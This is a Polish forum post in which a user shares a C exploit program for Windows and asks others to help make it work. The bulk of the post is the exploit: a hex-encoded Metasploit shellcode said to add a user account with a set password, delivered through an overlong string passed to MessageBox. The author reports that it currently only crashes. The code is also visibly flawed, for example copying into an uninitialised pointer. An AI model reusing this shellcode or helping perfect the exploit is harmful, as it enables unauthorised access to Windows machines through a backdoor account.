ďťż

Ładny brzuch

Witam

Wykodziłem taki oto eksploit, na bazie PoC z tej rosyjskiej strony security.nnov.ru:
#include <windows.h> #include <string.h> int main(void) { char bug1[501]; char* shellcode; const char shcode[] = "\x2b\xc9\x83\xe9\xc9\xd9\xee\xd9\x74\x24\ xf4\x5b\x81\x73\x13\x18" "\x6b\x0f\x83\x83\xeb\xfc\xe2\xf4\xe4\x83\ x4b\x83\x18\x6b\x84\xc6" "\x24\xe0\x73\x86\x60\x6a\xe0\x08\x57\x73\ x84\xdc\x38\x6a\xe4\xca" "\x93\x5f\x84\x82\xf6\x5a\xcf\x1a\xb4\xef\ xcf\xf7\x1f\xaa\xc5\x8e" "\x19\xa9\xe4\x77\x23\x3f\x2b\x87\x6d\x8e\ x84\xdc\x3c\x6a\xe4\xe5" "\x93\x67\x44\x08\x47\x77\x0e\x68\x93\x77\ x84\x82\xf3\xe2\x53\xa7" "\x1c\xa8\x3e\x43\x7c\xe0\x4f\xb3\x9d\xab\ x77\x8f\x93\x2b\x03\x08" "\x68\x77\xa2\x08\x70\x63\xe4\x8a\x93\xeb\ xbf\x83\x18\x6b\x84\xeb" "\x24\x34\x3e\x75\x78\x3d\x86\x7b\x9b\xab\ x74\xd3\x70\x9b\x85\x87" "\x47\x03\x97\x7d\x92\x65\x58\x7c\xff\x08\ x62\xe7\x36\x0e\x77\xe6" "\x38\x44\x6c\xa3\x76\x0e\x7b\xa3\x6d\x18\ x6a\xf1\x38\x08\x66\xf6" "\x6a\x07\x6e\xe9\x38\x08\x66\xf6\x6a\x07\ x6e\xe9\x74\x0a\x65\xa3" "\x37\x2a\x4b\xc7\x38\x4d\x29\xa3\x76\x0e\ x7b\xa3\x74\x04\x6c\xe2" "\x74\x0c\x7d\xec\x6d\x1b\x2f\xc2\x7c\x06\ x66\xed\x71\x18\x7b\xf1" "\x79\x1f\x60\xf1\x6b\x4b\x6c\xea\x6d\x19\ x63\xe2\x72\x4b\x20\xc2" "\x5c\x2f\x0f\x83"; strcpy(bug1, "\\?\\"); strcpy(shellcode, shcode); strcat(bug1, shcode); MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION); return 0; }
Shellcode pochodzi ze strony Metasploit, ma dodać użytkownika ciurlaj z hasłem ciurlajlaj, tryb SEH, długość chyba 294. Po kilku próbach eksploit nie działa :(. Powoduje tylko błąd (nie BSoD, zwykły błąd). Macie jakiś pomysł jak to można usprawnić?

Z góry dzięki,
MZet.

  • zanotowane.pl
  • doc.pisz.pl
  • pdf.pisz.pl
  • zsf.htw.pl
  •